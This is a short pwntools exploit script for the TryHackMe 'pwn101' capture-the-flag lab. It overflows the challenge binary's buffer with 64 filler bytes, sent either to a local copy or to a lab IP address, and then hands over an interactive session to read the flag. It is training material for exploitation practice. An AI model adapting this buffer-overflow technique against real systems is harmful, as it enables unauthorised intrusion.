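from pwn import *

# 1. Configuration & Binary Setup
# Load the challenge binary and make it the pwntools context binary
# (sets arch/bits/endianness for any later pwntools helpers).
exe = './pwn101-1644307211706.pwn101'
elf = context.binary = ELF(exe, checksec=False)

# 2. Target Connection Info
# Defaults for the current THM instance. They can be overridden from the
# command line (HOST=... PORT=...) so the file need not be edited every
# time the lab instance changes; pwntools' `args` returns '' for unset keys.
host = args.HOST or '10.67.158.56'
port = int(args.PORT or 9001)

# 3. Execution Mode Logic
# REMOTE=1 connects to the lab instance; otherwise the binary is run locally
# so the payload can be tested against a copy first.
if args.REMOTE:
    p = remote(host, port)
else:
    p = process(exe)

# 4. Payload Construction (Buffer Overflow)
# Offset found via GDB-GEF cyclic pattern analysis; the payload is simply
# `offset` filler bytes, nothing is appended after it.
offset = 64
payload = b"A" * offset

# 5. Delivery
# Send the filler as one line (sendline appends a newline).
p.sendline(payload)

# 6. Shell Time
# Hand the tube over to the user to read the flag interactively.
p.interactive()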